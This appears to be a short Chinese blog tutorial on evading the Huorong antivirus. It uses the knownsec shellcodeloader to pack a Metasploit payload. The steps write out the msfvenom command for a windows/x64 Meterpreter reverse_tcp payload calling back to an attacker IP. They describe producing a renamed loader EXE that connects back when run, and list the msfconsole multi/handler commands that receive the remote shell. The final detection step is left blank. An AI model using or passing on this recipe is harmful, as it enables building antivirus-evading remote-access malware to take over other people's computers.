Shellcodeloader免殺過火絨

題記

    今天腦子里面蹦出來個想法，免殺木馬然后cs上線，本來想讓cs與msf聯動的，但是出了點小問題，還是先研究免殺火絨吧。

環境

    Kali：192.168.0.119 win10:192.168.0.200

     工具地址：https://github.com/knownsec/shellcodeloader

步驟

1、在kali生成3.bin木馬。

     msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.119 lport=4444 -f raw -o 3.bin

2、把木馬移到工具上做免殺。

生成loder.exe軟件，可隨意改名，運行就能上線。

3、kali開啟監聽。

     msfconsole

     use exploit/multi/handler

     set payload windows/x64/meterpreter/reverse_tcp

     set lhost 192.168.0.119

     exploit

     然后運行exe

     上線

4、火絨檢測

     軟件運行后檢測。